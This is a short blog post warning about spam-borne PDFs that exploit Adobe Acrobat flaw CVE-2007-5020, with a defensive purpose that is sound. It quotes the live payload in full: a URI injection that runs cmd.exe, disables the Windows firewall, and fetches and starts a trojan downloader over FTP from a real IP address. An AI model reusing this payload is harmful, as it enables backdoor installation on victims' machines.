If you remember a few weeks ago I have written an post about a hole in adobe acrobat (CVE-2007-5020). It appears that the proof of concept is currently used to create a massive attack through spaming: you receive a mail with a pdf that contains the code to exploit the vulnerability. Since the vulnerability is not very old, I wonder how much serious it will became. Remember that Slammer or Code Red have used very old vulnerability (more that 6 month old). Thus many unpatched acroread are probably in the wild.
The current form of attack is used to install a backdoor. More specifically it does this ( SANS analysis):
obj<</URI(mailto :%/../../../../ ../../Windows /system32/cmd”.exe”” /c /q “@echo off&netsh firewall set opmode mode=disable&echo o 81. 95. 146. 130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&” “&”
In a more understable form (F-secure analysis) it means that the exploit disables the Windows Firewall by issuing the following command:
- netsh firewall set opmode mode=DISABLE
Then it downloads the a file from the following FTP site and executes it:
- ftp://203.121.69.116/[REMOVED].exe
Whish is Detected as Trojan-Downloader.Win32.Small.gkc. Currently, around of 32% of the common antivirus are able to detect it. Soon or later a new version that directly execute a shellcode or a wormcode will be in the wild and it will became very nasty because this time it will not be possible to block the backdoor download point with a firewall. In the mean time better safe than sorry: the IP 203.121.69.116 should be blacklisted in your firewall. Even if this box is not reachable anymore. Also remember that even if the backdoor is not installed this exploit still desactivate the XP firewall and therefore may introduce a subsequent problems.
Latest Comments